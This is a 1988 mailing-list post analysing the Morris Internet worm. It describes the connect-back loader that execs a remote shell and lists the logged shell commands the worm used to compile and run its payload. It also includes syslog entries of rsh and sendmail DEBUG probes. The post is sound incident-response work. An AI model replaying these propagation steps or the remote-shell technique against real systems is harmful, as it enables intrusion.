salzman@RAND.ORG (Isaac) (11/04/88)
After carefully leaving the sendmail ``hole'' open on our Internet machine
I've been able to track (for the most part) what the virus is doing and
how it's spreading itself.
The C program that is uploaded and compiled is only the start. After it's
compiled it's run with the following arguments: argv[1] is the Internet
addr of the infecting host, argv[2] is the port to connect to on that host
and argv[3] is the "magic" number. It connects back to the infecting host
and *carefully* transfers 3 files over. The socket remains open and
/bin/sh is then exec'd so the infecting host can send shell commands to it
after the files are transferred. Following is an excerpt from the log file of
my hacked up version of the .c file that's uploaded:
virus: pid=6828, args; x15886501 10.4.0.7 29451 15525687
connection on sockect 0 active
trying to write to file 'x15901447,sun3.o', len=47165
file 'x15901447,sun3.o' written!
trying to write to file 'x3338475,vax.o', len=45734
file 'x3338475,vax.o' written!
trying to write to file 'x11091853,l1.c', len=1542
file 'x11091853,l1.c' written!
starting up 'snoop' to watch the rest of the socket
"Snoop" is a shell script that's run in place of /bin/sh to capture the
shell commands that are being sent from the infecting host. Following is a
log of the shell commands are being sent:
PATH=/bin:/usr/bin:/usr/ucb
rm -f sh
if [ -f sh ]
then
P=x10903971
else
P=sh
fi
cc -o $P x15901447,sun3.o
./$P -p $$ x15901447,sun3.o x3338475,vax.o x11091853,l1.c
rm -f $P
cc -o $P x3338475,vax.o
./$P -p $$ x15901447,sun3.o x3338475,vax.o x11091853,l1.c
rm -f $P
rm -f x15901447,sun3.o $P
rm -f x3338475,vax.o $P
rm -f x11091853,l1.c $P
They real key is to find out what ./$P is actually doing. Knowing the
arguments to the program that's uploaded and executed may be 1/2 the battle
there - especially if you're running on a Sun 3 with SunOS 4.0 (let's thank
Sun for the "trace" command). So it's starting itself again, probably
using the pid ($$) as random seed, the rest of the arguments being the
names of the files to send off to the next victim. It looks real innocent
when you see "(sh)" in a ps listing (note what $P is set to)....
Earlier today Jim Gillogly (jim@rand.org) was able to find a table of
potential passwords that are probably used to crack accounts on the
infected machine. Some other research into the matter strongly suggests
that .rhosts and hosts.equiv files are used to target the next victim (that
seems to be common knowledge). It apparently tries one of two ways to break
into a machine. First it seems to try the rsh port. I've hacked up rshd to
report all outside attempts via syslog. It would consistenly come in over
rsh a minute or so before trying the SMTP port. Terry West (terry@rand.org)
hacked sendmail to report attempts to use the 'debug' command to the SMTP
server and log that with syslog as well, so we get stuff like this:
Nov 3 18:10:12 rand-unix rsh[4311]: external address detected port=2,fam=1008,addr=10.4.0.7
Nov 3 18:10:43 rand-unix sendmail[4328]: AA04328: DEBUG set from: SM.UNISYS.COM
Nov 3 18:43:08 rand-unix rsh[5106]: external address detected port=2,fam=1021,addr=10.2.0.10
Nov 3 18:43:41 rand-unix sendmail[5126]: AA05126: DEBUG set from: XN.LL.MIT.EDU
Nov 3 18:55:59 rand-unix rsh[5377]: external address detected port=2,fam=991,addr=128.52.32.14
Nov 3 18:57:18 rand-unix sendmail[5421]: AA05421: DEBUG set from: XN.LL.MIT.EDU
Nov 3 19:03:56 rand-unix rsh[5652]: external address detected port=2,fam=1015,addr=10.4.0.7
Nov 3 19:29:34 rand-unix rsh[6725]: external address detected port=2,fam=1003,addr=10.4.0.7
Nov 3 19:48:14 rand-unix rsh[7592]: external address detected port=2,fam=996,addr=10.4.0.7
Nov 3 19:48:46 rand-unix sendmail[7614]: AA07614: DEBUG set from: SM.UNISYS.COM
Nov 3 19:55:50 rand-unix rsh[7698]: external address detected port=2,fam=1018,addr=10.6.0.94
Nov 3 19:56:25 rand-unix sendmail[7712]: AA07712: DEBUG set from: UXC.CSO.UIUC.EDU
So that's the scoop, so far. Of course by the time this makes it out to
the tcp-ip list this will be old news, eh? :-) Now to tear apart the
fake "sh"..... Ciao!
--
* Isaac J. Salzman ----
* The RAND Corporation - Information Sciences Dept. /o o/ /
* 1700 Main St., PO Box 2138, Santa Monica, CA 90406-2138 | v | |
* AT&T: +1 213-393-0411 x6421 or x7923 (ISL lab) _| |_/
* ARPA: salzman@RAND.ORG or salzman@rand-unix.ARPA / | |
* UUCP: ...!{cbosgd,decvax,sdcrdcf}!randvax!salzman | | |